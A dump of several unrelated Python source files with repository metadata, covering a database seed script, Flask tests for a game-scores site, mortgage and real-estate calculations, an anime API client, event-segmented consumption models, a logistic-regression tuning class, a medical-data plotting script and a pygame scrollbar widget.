8eaf5d71da4aea86f6032fa830b38828a3ca197e | 1,102 | py | Python | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | app/cruds/seeds.py | woods0918/graphql_server_sample | b19e57fedb8cdb41ee001c8e80ef4baeebc8fe99 | [
"MIT"
] | null | null | null | import sys
import pathlib
from datetime import datetime
current_dir = pathlib.Path(__file__).resolve().parent
sys.path.append( str(current_dir) + '/../../' )
from app.database import BASE, ENGINE, session_scope
from app.models.todos import Todo
from app.models.users import User
def generate_seed_data():
    """Create all tables and insert three demo users plus six todos
    (two per user) into the database."""
    BASE.metadata.create_all(ENGINE)
    # Each inner list holds a single user name (User's first ctor argument).
    users = [["太郎"], ["次郎"], ["花子"]]
    # Rows are [user_id, title, description, deadline]; user_ids 1-3 assume
    # the users above receive sequential ids -- TODO confirm against User.
    todos = [
        [1, "title1", "description1", datetime.now()],
        [1, "title2", "description2", datetime.now()],
        [2, "title3", "description3", datetime.now()],
        [2, "title4", "description4", datetime.now()],
        [3, "title5", "description5", datetime.now()],
        [3, "title6", "description6", datetime.now()]
    ]
    # session_scope presumably commits on exit -- all inserts are one unit.
    with session_scope() as session:
        for user in users:
            session.add(User(user[0]))
        for todo in todos:
            session.add(Todo(
                user_id = todo[0],
                title = todo[1],
                description = todo[2],
                deadline = todo[3]
            ))
# Allow running this module directly as a seeding script.
if __name__ == "__main__":
    generate_seed_data()
| 29.783784 | 54 | 0.57804 | 125 | 1,102 | 4.92 | 0.504 | 0.107317 | 0.042276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02836 | 0.264065 | 1,102 | 36 | 55 | 30.611111 | 0.729963 | 0 | 0 | 0 | 0 | 0 | 0.11706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.193548 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eaf99475c5184ec13f9c69b29833abb9f843b06 | 3,217 | py | Python | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | null | null | null | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | 5 | 2019-11-04T09:00:39.000Z | 2021-03-30T06:44:26.000Z | tests/test_rogue_web.py | bfontaine/rogue_scores | 894f118de81e91246a114a0bc3ed74de2edd3cc8 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
import os
import os.path
import json
import platform
import tempfile
import logging
if platform.python_version() < '2.7':
import unittest2 as unittest
else:
import unittest
from rogue_scores.web import app
from rogue_scores.web.app import index, scores_upload, scores_json
class FakeRequest(object):
    """Minimal stand-in for the web framework request object, used to stub
    ``app.request`` in the tests below."""
    # Class-level payload; tests assign to it before instantiating.
    scores = '[]'
    def __init__(self, *args, **kwargs):
        self.form = {'scores': FakeRequest.scores}
        self.headers = {}
        self.args = {}
# Silence the application logger for the whole test run.
app.app.logger.handlers = [logging.FileHandler('/dev/null')]
class TestRogueWeb(unittest.TestCase):
    """Tests for the rogue_scores web views (index, scores upload, JSON).

    Each test runs against a temporary scores file and a stubbed request;
    the real config/request are restored in tearDown.
    NOTE(review): assertEquals/assertRegexpMatches are the deprecated
    aliases, kept for Python 2 / unittest2 compatibility.
    """
    def setUp(self):
        # Save real config/request so tearDown can restore them.
        self._scores = app.app.config['SCORES']
        self._req = app.request
        self.tmp = tempfile.NamedTemporaryFile(delete=False)
        app.request = FakeRequest()
        app.app.config['SCORES'] = self.tmp.name
        # Seed the temporary scores file with two known entries.
        self.json = json.dumps([
            {'user': 'foo', 'level': 42, 'cause': 'bar',
                'status': 'killed', 'score': 24},
            {'user': 'moo', 'level': 25, 'cause': 'qwe',
                'status': 'killed', 'score': 255}
        ]).encode('utf-8')
        self.tmp.write(self.json)
        self.tmp.close()
    def tearDown(self):
        app.app.config['SCORES'] = self._scores
        app.request = self._req
        if os.path.isfile(self.tmp.name):
            os.unlink(self.tmp.name)
    def getScores(self):
        # Helper: parse the scores file the app writes to.
        with open(self.tmp.name) as f:
            return json.loads(f.read())
    # == .index == #
    def test_index_no_score(self):
        os.unlink(self.tmp.name)
        with app.app.app_context():
            ret = index()
            # No score rows: table header is immediately followed by </table>.
            self.assertRegexpMatches(ret, r'</th>\s*</tr>\s*</table>')
    # == .scores_upload == #
    def test_scores_upload_wrong_json(self):
        FakeRequest.scores = '}w$'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('wrong json', ret)
    def test_scores_upload_no_scores(self):
        FakeRequest.scores = '[]'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('ok', ret)
    def test_scores_upload_new_scores(self):
        # A higher score should land at the top of the stored list.
        FakeRequest.scores = '[["myname", 50, "killed by a foo on level 43"]]'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('ok', ret)
            d = {'user': 'myname', 'level': 43,
                 'status': 'killed', 'cause': 'foo', 'score': 50}
            self.assertEquals(d, self.getScores()[0])
    # == .scores_json == #
    def test_scores_json(self):
        with app.app.app_context():
            resp = scores_json()
            self.assertEquals(json.loads(self.json.decode('utf-8')),
                              json.loads(resp.data.decode('utf-8')))
    def test_scores_pretty_json(self):
        # ?pretty=1 must keep the same data but produce indented output.
        app.request = self._req
        with app.app.test_request_context('/scores?pretty=1'):
            resp = scores_json()
            txt = resp.data.decode('utf-8')
            self.assertEquals(json.loads(self.json.decode('utf-8')),
                              json.loads(txt))
            self.assertRegexpMatches(txt, '^\[\n +\{')
| 30.638095 | 78 | 0.5788 | 385 | 3,217 | 4.711688 | 0.285714 | 0.049614 | 0.033076 | 0.035832 | 0.305402 | 0.194598 | 0.181918 | 0.181918 | 0.181918 | 0.181918 | 0 | 0.011869 | 0.266708 | 3,217 | 104 | 79 | 30.932692 | 0.7571 | 0.023624 | 0 | 0.271605 | 0 | 0 | 0.093231 | 0.007663 | 0 | 0 | 0 | 0 | 0.098765 | 1 | 0.123457 | false | 0 | 0.123457 | 0 | 0.296296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb1ed9124daee9f997f42d027fa2279f05ec66b | 3,162 | py | Python | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | OwnVsRent/Investment.py | hermantai/beta-programs | 06dadc61845a55f15dba76f1438b6795d26d6820 | [
"Apache-2.0"
] | null | null | null | """
Investment
created by Herman Tai 3/20/2008
"""
from math import *
# Absolute tolerance used for float equality comparisons.
TOLERANCE = 0.0000001


def equals(n1, n2):
    """Return True when *n1* and *n2* differ by less than TOLERANCE."""
    difference = n1 - n2
    return abs(difference) < TOLERANCE
def calculate_monthly_payment(principle, year, rate_percent):
    """Return the level monthly payment amortizing a loan.

    principle: amount borrowed.
    year: loan term in years.
    rate_percent: annual interest rate as a percentage (e.g. 6 for 6%).
    """
    n_terms = year * 12.0
    annual_rate = rate_percent / 100.0
    monthly_rate = annual_rate / 12.0
    # Special case: a zero-interest loan is just the principal spread evenly.
    if monthly_rate == 0:
        return principle / n_terms
    growth = 1 + monthly_rate
    # Standard annuity formula: P * z^n * (z - 1) / (z^n - 1).
    return principle * growth ** n_terms * (growth - 1) / (growth ** n_terms - 1)
def calculate_principle(pmt, years, rate_percent):
    """Return the loan principal that the monthly payment *pmt* amortizes
    over *years* years at an annual rate of *rate_percent* percent."""
    n_terms = years * 12.0
    monthly_rate = (rate_percent / 100.0) / 12.0
    growth = 1 + monthly_rate
    # Zero-interest loan: the principal is simply the sum of the payments.
    if growth == 1:
        return pmt * n_terms
    factor = growth ** n_terms
    # Present value of an annuity: (z^n - 1) * pmt / ((z - 1) * z^n).
    return (factor - 1) * pmt / ((growth - 1) * factor)
def calculate_years(principle, pmt, rate_percent):
    """Return the number of years needed to pay off *principle* with a
    monthly payment of *pmt* at an annual rate of *rate_percent* percent.

    Fix: the original raised ZeroDivisionError for a 0% rate
    (log(1 + 0) == 0); the zero-rate case is now handled explicitly,
    consistent with calculate_monthly_payment / calculate_principle.

    Raises ValueError (from math.log) when *pmt* does not exceed the
    monthly interest on *principle*, i.e. the loan never amortizes.
    """
    monthly_rate = (rate_percent / 100.0) / 12.0
    if monthly_rate == 0:
        # Zero-interest loan: term in months is principal / payment.
        return principle / pmt / 12.0
    top_part = log(pmt) - log(pmt - principle * monthly_rate)
    bottom_part = log(1 + monthly_rate)
    terms = top_part / bottom_part
    return terms / 12.0
def number_format(num, places=0):
    """Format a number with grouped thousands and given decimal places.

    Fix: the original hand-rolled grouping loop inserted a comma right
    after the minus sign for negative numbers whose digit count was a
    multiple of three (e.g. -123456 -> "-,123,456"). The ',' option of
    the format mini-language groups correctly and handles the sign.
    """
    places = max(0, places)
    return "{0:,.{1}f}".format(num, places)
class RealEstateInvestment:
    """Simple cash-flow model for a property investment.

    All monetary inputs are coerced to float. Rates (*apr*,
    *annual_expense_percent*, *appreciation*, *inflation*) are percentages.
    """

    def __init__(self, price, years, apr, monthly_expense=0, annual_expense_percent=0, appreciation=0, inflation=0, one_time_expense=0, down_payment=0, rent=0):
        self.price = float(price)
        self.years = float(years)
        self.apr = float(apr)
        self.monthly_expense = float(monthly_expense)
        self.annual_expense_percent = float(annual_expense_percent)
        self.appreciation = float(appreciation)
        self.inflation = float(inflation)
        self.one_time_expense = float(one_time_expense)
        self.down_payment = float(down_payment)
        self.rent = float(rent)

    def get_noi(self, yr=1):
        """Net operating income for year *yr*: rental income minus expenses.

        Year 1 additionally carries the down payment and one-time costs.
        """
        upfront = (self.down_payment + self.one_time_expense) if yr == 1 else 0
        outgo = upfront + self.get_annual_expense(yr) + self.get_mortgage_payment() * 12
        return self.get_rent(yr) * 12 - outgo

    def get_monthly_expense(self, yr=1):
        """Monthly expense for year *yr*, grown by inflation since year 1."""
        growth = 1 + self.inflation / 100.0
        return self.monthly_expense * growth ** (yr - 1)

    def get_annual_expense(self, yr=1):
        """Annual expense: a percentage of the asset value plus the monthly
        expense.

        NOTE(review): the monthly expense is added once, not multiplied by
        12 — preserved as in the original; confirm this is intentional.
        """
        return self.get_asset_value(yr) * self.annual_expense_percent / 100 + self.get_monthly_expense(yr)

    def get_asset_value(self, yr=1):
        """Property value in year *yr* after compound appreciation."""
        return self.price * (1 + self.appreciation / 100) ** (yr - 1)

    def get_rent(self, yr=1):
        """Monthly rent in year *yr*, grown by inflation since year 1."""
        return self.rent * (1 + self.inflation / 100.0) ** (yr - 1)

    def get_mortgage_payment(self):
        """Monthly mortgage payment on the financed portion of the price."""
        financed = self.price - self.down_payment
        return calculate_monthly_payment(financed, self.years, self.apr)
| 31.62 | 159 | 0.63852 | 444 | 3,162 | 4.373874 | 0.207207 | 0.013903 | 0.018023 | 0.027806 | 0.065911 | 0.029866 | 0.029866 | 0.029866 | 0 | 0 | 0 | 0.045209 | 0.237508 | 3,162 | 99 | 160 | 31.939394 | 0.760265 | 0.038267 | 0 | 0.053333 | 0 | 0 | 0.001982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.013333 | 0.053333 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb2a4b31e0e2b5fb4e1538f458c2107162096b7 | 1,544 | py | Python | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | Sakurajima/models/recommendation.py | TrimVis/Sakurajima | 9d3f6acc0a6228d94da58a518f7cfdd796d652f7 | [
"MIT"
] | null | null | null | import requests
import json
from Sakurajima.models import base_models as bm
class RecommendationEntry(object):
    """One anime recommendation entry returned by the site's API."""

    # Mapping: instance attribute -> key in the API response dict.
    _FIELD_MAP = (
        ("title", "title"),
        ("episodes_max", "episodes_max"),
        ("type", "type"),
        ("anime_id", "detail_id"),
        ("cover", "cover"),
        ("airing_start", "airing_start"),
        ("recommendations", "recommendations"),
        ("d_status", "d_status"),
        ("has_special", "hasSpecial"),
        ("progress", "progress"),
        ("cur_episodes", "cur_episodes"),
    )

    def __init__(self, data_dict, headers, cookies, api_url):
        self.__headers = headers
        self.__cookies = cookies
        self.__API_URL = api_url
        # Missing keys default to None, mirroring dict.get's behaviour.
        for attr, key in self._FIELD_MAP:
            setattr(self, attr, data_dict.get(key))

    def __post(self, payload):
        # POST the controller/action payload and decode the JSON response.
        with requests.post(
            self.__API_URL, headers=self.__headers, json=payload, cookies=self.__cookies
        ) as response:
            return json.loads(response.text)

    def __repr__(self):
        return f"<RecommendationEntry: {self.title}>"

    def get_anime(self):
        """Fetch and return the full Anime object for this recommendation."""
        payload = {
            "controller": "Anime",
            "action": "getAnime",
            "detail_id": str(self.anime_id),
        }
        anime_data = self.__post(payload)["anime"]
        return bm.Anime(
            anime_data,
            headers=self.__headers,
            cookies=self.__cookies,
            api_url=self.__API_URL,
        )
| 35.090909 | 85 | 0.619171 | 189 | 1,544 | 4.724868 | 0.275132 | 0.107503 | 0.135498 | 0.038074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262953 | 1,544 | 43 | 86 | 35.906977 | 0.78471 | 0 | 0 | 0 | 0 | 0 | 0.115285 | 0.013601 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.078947 | 0.026316 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb329a5034df522f053c63062da9cdf64fd7143 | 3,620 | py | Python | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | null | null | null | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | 13 | 2021-03-25T22:24:38.000Z | 2022-03-12T00:56:45.000Z | edinet_baseline_hourly_module/edinet_models/pyEMIS/EventDetection/event_model.py | BeeGroup-cimne/module_edinet | 0cda52e9d6222a681f85567e9bf0f7e5885ebf5e | [
"MIT"
] | 1 | 2019-03-13T09:49:56.000Z | 2019-03-13T09:49:56.000Z | """Events separate segements of data. A model is fitted to each segment independently"""
import numpy as np
class InvalidPeriod(Exception): pass
class event(object):
    """A boundary date that separates two modelling segments."""

    def __init__(self, date):
        # Timestamp (same units as the data's 'date' column) where a new
        # segment begins.
        self.date = date
def period_range(min_date, max_date, events, index):
    """Return the {'from', 'to'} date pair bounding segment *index*.

    The segment boundaries are min_date, the (sorted) event dates, and
    max_date. Raises InvalidPeriod when *index* exceeds the number of
    segments implied by *events*.
    """
    if index > len(events):
        raise InvalidPeriod('Not enough events to generate period %s' % index)
    boundaries = [min_date, max_date] + [e.date for e in events]
    boundaries.sort()
    return {'from': boundaries[index], 'to': boundaries[index + 1]}
def period_data(data, events, i):
    """Return the rows of *data* whose 'date' falls inside segment *i*.

    *data* is indexed with boolean masks on its 'date' field (a NumPy
    structured array in practice). Segment *i* spans from event i-1's
    date (inclusive; the data minimum for i == 0) up to event i's date
    (exclusive; the data maximum, inclusive, for the last segment).
    """
    min_date, max_date = np.min(data['date']), np.max(data['date'])
    # Called purely for validation: raises InvalidPeriod if i is out of range.
    period_range(min_date, max_date, events, i)
    lower = data['date'] >= (min_date if i == 0 else events[i - 1].date)
    if i == len(events):
        upper = data['date'] <= max_date
    else:
        upper = data['date'] < events[i].date
    return data[lower & upper]
def periods(data, events, model):
    """Fit *model* independently to each event-delimited segment of *data*.

    Returns one model instance per segment (len(events) + 1 of them).
    """
    segment_count = len(events) + 1
    return [model(period_data(data, events, i)) for i in range(segment_count)]
class event_model(object):
    """Fits the given data to the given model but allows for events to be
    added which segment the modelling.

    Fix: the original ``__init__`` was declared as ``__init__(self, data)``
    yet read an undefined global ``model`` (a NameError), while the module's
    own ``__main__`` block calls ``event_model(data, Constant)`` with two
    arguments. ``model`` is now an explicit parameter.
    """

    def __init__(self, data, model):
        # model: a callable (class) that fits one segment of data.
        self.model = model
        self.data = data
        self.events = []
        self._recalculate()

    def _recalculate(self):
        """Regenerate all internal models based on event dates and saved
        input data."""
        # Equivalent to: self.periods = periods(self.data, self.events, self.model)
        self.periods = []
        for i in range(len(self.events) + 1):
            p_data = period_data(self.data, self.events, i)
            self.periods.append(self.model(p_data))

    def add_event(self, ev):
        """Register a new segmentation event and refit every segment."""
        self.events.append(ev)
        self.events.sort(key=lambda x: x.date)
        self._recalculate()

    def _segmented(self, independent_data, method_name):
        # Apply the named per-period method segment by segment and
        # concatenate the pieces in date order.
        result = None
        for i in range(len(self.periods)):
            p_data = period_data(independent_data, self.events, i)
            piece = getattr(self.periods[i], method_name)(p_data)
            result = piece if i == 0 else np.concatenate((result, piece))
        return result

    def prediction(self, independent_data):
        """Per-segment predictions over *independent_data*, concatenated."""
        return self._segmented(independent_data, 'prediction')

    def simulation(self, independent_data):
        """Per-segment simulations over *independent_data*, concatenated."""
        return self._segmented(independent_data, 'simulation')

    def residuals(self, independent_data):
        """Observed consumption minus the model prediction."""
        pred = self.prediction(independent_data)
        return independent_data['consumption'] - pred

    def parameters(self):
        """Return the fitted parameters of each segment's model, in order."""
        return [p.parameters() for p in self.periods]
if __name__ == "__main__":
    # Demo: fit a constant model to random data, insert evenly spaced
    # events, then plot the data, residuals and prediction.
    import matplotlib.pyplot as plt
    from ConsumptionModels import Constant, TwoParameterModel
    from DataAccess import RandomDataFactory
    f = RandomDataFactory()
    data = f.randomData(1000)
    # NOTE(review): event_model.__init__ is declared with (self, data) only;
    # this two-argument call implies a missing 'model' parameter — verify.
    em = event_model(data, Constant)
    # Add 8 events at 200000-unit intervals along the date axis.
    for d in range(8):
        em.add_event(event(200000.0 * (d + 1)))
    pred = em.prediction(data)
    res = em.residuals(data)
    # print em.parameters()
    plt.plot(data['date'], data['consumption'])
    plt.plot(data['date'], res)
    plt.plot(data['date'], pred)
    plt.show()
| 34.150943 | 110 | 0.625138 | 487 | 3,620 | 4.507187 | 0.232033 | 0.032802 | 0.031891 | 0.020046 | 0.217768 | 0.176765 | 0.121185 | 0.07836 | 0.07836 | 0.07836 | 0 | 0.007766 | 0.253039 | 3,620 | 105 | 111 | 34.47619 | 0.803994 | 0.112431 | 0 | 0.195122 | 0 | 0 | 0.034796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134146 | false | 0.012195 | 0.04878 | 0 | 0.304878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb3fe8d61ca018e169ea0f932496e2418d8f490 | 2,388 | py | Python | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | muscle_tuning/logisticregression_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
import numpy as np
from .param_tuning import ParamTuning
class LogisticRegressionTuning(ParamTuning):
    """
    Tuning class for logistic-regression classifiers.

    NOTE(review): the original (Japanese) docstring read "support vector
    classification", which looks copied from an SVM tuner — the estimator
    below is a standardization + logistic-regression pipeline. Confirm.
    """
    # -- Common constants --
    SEED = 42  # default random seed
    SEEDS = [42, 43, 44, 45, 46, 47, 48, 49, 50, 51]  # default list of random seeds
    CV_NUM = 5  # default number of cross-validation folds during optimization

    # Estimator instance (pipeline: standardization + logistic regression)
    ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("logr", LogisticRegression())])

    # Default fit-time parameters
    FIT_PARAMS = {}

    # Default metric maximized during optimization
    # ('neg_log_loss', 'roc_auc', 'roc_auc_ovr', ...)
    SCORING = 'neg_log_loss'

    # Parameters excluded from optimization
    NOT_OPT_PARAMS = {'penalty': 'l2',  # regularization penalty ('l1', 'l2', 'elasticnet')
                      'solver': 'lbfgs'  # solver used for fitting ('newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga')
                      }

    # Grid-search candidates
    CV_PARAMS_GRID = {'C': np.logspace(-2, 3, 21).tolist()  # regularization strength C (small -> underfitting, large -> overfitting)
                      }

    # Random-search parameters
    N_ITER_RANDOM = 25  # number of random-search trials
    CV_PARAMS_RANDOM = {'C': np.logspace(-2, 3, 26).tolist()
                        }

    # Bayesian-optimization parameters
    N_ITER_BAYES = 20  # number of BayesianOptimization trials
    INIT_POINTS = 5  # number of initial BayesianOptimization points (random probes)
    ACQ = 'ei'  # BayesianOptimization acquisition function (https://ohke.hateblo.jp/entry/2018/08/04/230000)
    N_ITER_OPTUNA = 25  # number of Optuna trials
    BAYES_PARAMS = {'C': (0.01, 1000)
                    }
    INT_PARAMS = []

    # Parameter ranges for the range-selection validation curve
    VALIDATION_CURVE_PARAMS = {'C': np.logspace(-3, 4, 15).tolist()
                               }
    # Axis scale per parameter when plotting validation curves ('linear', 'log')
    PARAM_SCALES = {'C': 'log',
                    'l1_ratio': 'linear'
                    }

    def _not_opt_param_generation(self, src_not_opt_params, seed, scoring):
        """
        Generate the non-optimized parameters (add the random seed; for SVR
        with log-loss this would also set `probability`, etc.).

        Parameters
        ----------
        src_not_opt_params : Dict
            Non-optimized parameters before processing
        seed : int
            Random seed
        scoring : str
            Metric maximized during optimization
        """
        # Propagate the seed into not_opt_params' 'random_state' argument.
        # NOTE(review): this only overwrites an *existing* 'random_state'
        # key, and NOT_OPT_PARAMS above contains none, so the seed is never
        # applied here — possibly 'not in' was intended. Verify upstream.
        if 'random_state' in src_not_opt_params:
            src_not_opt_params['random_state'] = seed
        return src_not_opt_params
8eb4e2799d377de7e9d39b8148f9aadd7b2d4071 | 1,578 | py | Python | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | main.py | Marques004/Medical-Data-Visualizer | 1c096cc3f7732b532b94a60021f102f15680f98c | [
"MIT"
] | null | null | null | import os
os.environ['MPLCONFIGDIR'] = os.getcwd() + "/configs/"
import matplotlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('medical_examination.csv')
df['overweight'] = (df['weight'] / (df['height']/100)**2).apply(lambda x: 1 if x > 25 else 0)
df['cholesterol'] = df['cholesterol'].apply(lambda x: 0 if x == 1 else 1)
df['gluc'] = df['gluc'].apply(lambda x: 0 if x == 1 else 1)
def draw_cat_plot():
df_cat = pd.melt(df, id_vars = 'cardio', var_name = 'variable', value_vars = ['alco', 'active','cholesterol', 'gluc', 'overweight','smoke'])
df_cat = pd.melt(df, var_name = 'variable', value_vars = ['active','alco','cholesterol', 'gluc','overweight','smoke'], id_vars = 'cardio')
# Desenha o catplot com 'sns.catplot()'
fig = sns.catplot(data=df_cat, kind="count", x="variable",hue="value", col="cardio").set_axis_labels("variable", "total")
fig = fig.fig
fig.savefig('catplot.png')
return fig
def draw_heat_map():
# limpa a Data
df_heat = df[(df['ap_lo']<=df['ap_hi']) &
(df['height'] >= df['height'].quantile(0.025))&
(df['height'] <= df['height'].quantile(0.975))&
(df['weight'] >= df['weight'].quantile(0.025))&
(df['weight'] <= df['weight'].quantile(0.975))
]
corr = df_heat.corr()
mask = np.triu(corr)
fig, ax = plt.subplots(figsize=(7, 5))
sns.heatmap(corr,mask=mask, fmt='.1f',vmax=.3, linewidths=.5,square=True, cbar_kws = {'shrink':0.5},annot=True, center=0)
fig.savefig('heatmap.png')
return fig
| 33.574468 | 144 | 0.627376 | 240 | 1,578 | 4.033333 | 0.4125 | 0.041322 | 0.030992 | 0.02686 | 0.225207 | 0.14876 | 0.045455 | 0.045455 | 0.045455 | 0 | 0 | 0.028788 | 0.163498 | 1,578 | 46 | 145 | 34.304348 | 0.704545 | 0.031686 | 0 | 0.064516 | 0 | 0 | 0.216393 | 0.015082 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.193548 | 0 | 0.322581 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb5d6396e2a31bb9fbff7585432ac8ecb96f4b0 | 2,785 | py | Python | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-ml | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 3 | 2019-07-26T15:47:23.000Z | 2019-10-02T13:39:49.000Z | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-ml | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 5 | 2019-07-26T20:32:50.000Z | 2019-07-26T20:48:34.000Z | Gadakeco_Code/src/gui/guiscrollbar.py | YueNing/gadakeco-neat | ec64703d7d6582d867b873f333b230d32b0e1d1a | [
"MIT"
] | 1 | 2019-07-28T21:51:19.000Z | 2019-07-28T21:51:19.000Z | import pygame
from gui.guielement import GuiElement
HORIZONTAL = 0
VERTICAL = 1
class GuiScrollbar(GuiElement):
"""
scrollbar / slider
"""
def __init__(self, x, y, width, height, fontObj, value=0.0, orientation=HORIZONTAL, barLength=30):
GuiElement.__init__(self, x, y, width, height, fontObj)
self._value = value
self._orientation = orientation
self._barLength = barLength
self.setEventTypes(pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION)
self._grabbed = False
self._func = None
def getValue(self):
return self._value
def setValue(self, value):
self._value = min(max(value, 0), 1)
def connect(self, func, *params):
self._func = func
self._params = params
return self
def update(self, t):
pass
def canHandleEvent(self, event):
return GuiElement.canHandleEvent(self, event)
def handleEvent(self, event):
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
if self._aabb.contains(*pygame.mouse.get_pos()):
self._grabbed = True
return True
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
if self._grabbed:
self._grabbed = False
if self._func != None:
self._func(*self._params)
return True
elif event.type == pygame.MOUSEMOTION:
if self._grabbed:
if self._orientation == HORIZONTAL:
self.setValue(
(event.pos[0] - self._barLength / 2.0 - self.getX()) / (self.getWidth() - self._barLength))
else:
self.setValue(
(event.pos[1] - self._barLength / 2.0 - self.getY()) / (self.getHeight() - self._barLength))
return True
return False
def draw(self, screen):
screen.fill((50, 50, 50), self.getRect())
if self._orientation == HORIZONTAL:
y = self.getY() + self.getHeight() / 2.0 - 1
screen.fill((255, 255, 255), (self.getX(), y, self.getWidth(), 2))
barX = self.getX() + self._value * (self.getWidth() - self._barLength)
screen.fill((100, 200, 255), (barX, self.getY(), self._barLength, self.getHeight()))
else:
x = self.getX() + self.getWidth() / 2.0 - 1
screen.fill((255, 255, 255), (x, self.getY(), 2, self.getHeight()))
barY = self.getY() + self._value * (self.getHeight() - self._barLength)
screen.fill((100, 200, 255), (self.getX(), barY, self.getWidth(), self._barLength))
